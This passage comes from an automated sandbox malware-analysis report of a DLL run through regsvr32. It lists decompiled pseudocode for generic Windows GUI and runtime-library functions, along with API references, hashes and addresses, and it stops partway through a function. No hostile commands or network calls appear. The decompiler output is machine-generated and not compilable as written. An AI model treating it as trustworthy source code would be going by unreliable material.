                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetWindowRect.USER32 ref: 1003450F
                                                                                                            • GetSystemMetrics.USER32 ref: 1003451D
                                                                                                            • GetSystemMetrics.USER32 ref: 10034523
                                                                                                            • GetKeyState.USER32(00000002), ref: 10034540
                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406722796-0
                                                                                                            • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                                                            • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}








                                                                                                            0x10022c99
                                                                                                            0x10022c9e
                                                                                                            0x10022cad
                                                                                                            0x10022cb0
                                                                                                            0x10022cbb
                                                                                                            0x10022cc5
                                                                                                            0x10022cce
                                                                                                            0x10022cd2
                                                                                                            0x10022cd9
                                                                                                            0x10022cda
                                                                                                            0x10022ce6
                                                                                                            0x10022cef
                                                                                                            0x10022cf0
                                                                                                            0x10022cfa
                                                                                                            0x10022d26
                                                                                                            0x10022d28
                                                                                                            0x10022d2d
                                                                                                            0x10022d42
                                                                                                            0x10022d66
                                                                                                            0x10022d66
                                                                                                            0x10022d44
                                                                                                            0x10022d4f
                                                                                                            0x10022d55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022d55
                                                                                                            0x10022d42
                                                                                                            0x10022d6f
                                                                                                            0x10022d6f
                                                                                                            0x10022d26
                                                                                                            0x10022d7d
                                                                                                            0x10022d7f
                                                                                                            0x10022d87
                                                                                                            0x10022d88
                                                                                                            0x10022d92
                                                                                                            0x10022d95
                                                                                                            0x10022d9f
                                                                                                            0x10022da7

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CtrlH_prologMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4125289812-0
                                                                                                            • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                                                            • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}








                                                                                                            0x100316ea
                                                                                                            0x100316f6
                                                                                                            0x10031703
                                                                                                            0x100316f8
                                                                                                            0x100316f8
                                                                                                            0x100316f8
                                                                                                            0x10031710
                                                                                                            0x10031714
                                                                                                            0x10031725
                                                                                                            0x10031753
                                                                                                            0x1003172f
                                                                                                            0x1003172f
                                                                                                            0x1003173f
                                                                                                            0x10031741
                                                                                                            0x10031741
                                                                                                            0x10031725
                                                                                                            0x10031784
                                                                                                            0x10031784
                                                                                                            0x10031786
                                                                                                            0x1003178a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10031771
                                                                                                            0x1003177f
                                                                                                            0x1003177f
                                                                                                            0x10031784
                                                                                                            0x10031784
                                                                                                            0x10031790

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32 ref: 1003173F
                                                                                                            • SendMessageA.USER32 ref: 10031753
                                                                                                            • GetDesktopWindow.USER32 ref: 10031757
                                                                                                            • SendMessageA.USER32 ref: 1003177F
                                                                                                            • GetWindow.USER32(00000000), ref: 10031784
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$DesktopLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 2272707703-0
                                                                                                            • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                                                            • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0xf3933a06
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}










                                                                                                            0x10031e78
                                                                                                            0x10031e7e
                                                                                                            0x10031e81
                                                                                                            0x10031e8c
                                                                                                            0x10031e91
                                                                                                            0x10031ea5
                                                                                                            0x10031eab
                                                                                                            0x10031eb1
                                                                                                            0x10031ebc
                                                                                                            0x10031edc
                                                                                                            0x10031eeb
                                                                                                            0x10031f03
                                                                                                            0x10031f0c
                                                                                                            0x10031f33
                                                                                                            0x10031f3a
                                                                                                            0x10031ebc
                                                                                                            0x10031eab
                                                                                                            0x10031f47

                                                                                                            APIs
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031EDC
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031EEB
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031F03
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031F0C
                                                                                                            • SendMessageA.USER32 ref: 10031F33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1515195355-0
                                                                                                            • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                                                            • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x10033e16
                                                                                                            0x10033e19
                                                                                                            0x10033e1e
                                                                                                            0x10033e6a
                                                                                                            0x10033e70
                                                                                                            0x00000000
                                                                                                            0x10033e20
                                                                                                            0x10033e29
                                                                                                            0x10033e2e
                                                                                                            0x10033e64
                                                                                                            0x10033e66
                                                                                                            0x10033e75
                                                                                                            0x10033e75
                                                                                                            0x10033e87
                                                                                                            0x10033e8f
                                                                                                            0x10033e95
                                                                                                            0x10033e97
                                                                                                            0x10033e35
                                                                                                            0x10033e37
                                                                                                            0x10033e3b
                                                                                                            0x10033e43
                                                                                                            0x10033e4a
                                                                                                            0x10033e4d
                                                                                                            0x10033e4d
                                                                                                            0x10033e2e
                                                                                                            0x10033e9e

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,742C8B90), ref: 10033E23
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 10033E95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                                                            • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x10033ea4
                                                                                                            0x10033ea7
                                                                                                            0x10033eac
                                                                                                            0x10033ef8
                                                                                                            0x10033efe
                                                                                                            0x00000000
                                                                                                            0x10033eae
                                                                                                            0x10033eb7
                                                                                                            0x10033ebc
                                                                                                            0x10033ef2
                                                                                                            0x10033ef4
                                                                                                            0x10033f03
                                                                                                            0x10033f03
                                                                                                            0x10033f15
                                                                                                            0x10033f1e
                                                                                                            0x10033f20
                                                                                                            0x10033f23
                                                                                                            0x10033f25
                                                                                                            0x10033ec3
                                                                                                            0x10033ec5
                                                                                                            0x10033ec9
                                                                                                            0x10033ed1
                                                                                                            0x10033ed8
                                                                                                            0x10033edb
                                                                                                            0x10033edb
                                                                                                            0x10033ebc
                                                                                                            0x10033f2c

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                                                            • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                                                            • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                                                            • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0xf3933a06
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                                                            0x10016b4a
                                                                                                            0x10016b51
                                                                                                            0x10016b5f
                                                                                                            0x10016b6b
                                                                                                            0x10016b73
                                                                                                            0x10016b7b
                                                                                                            0x10016b87
                                                                                                            0x10016b90
                                                                                                            0x10016b93
                                                                                                            0x10016b95
                                                                                                            0x10016b9b
                                                                                                            0x10016b9d
                                                                                                            0x10016b9d
                                                                                                            0x00000000
                                                                                                            0x10016ba7
                                                                                                            0x10016ba9

                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                                                            • GetTickCount.KERNEL32 ref: 10016B7B
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1445889803-0
                                                                                                            • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                                                            • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
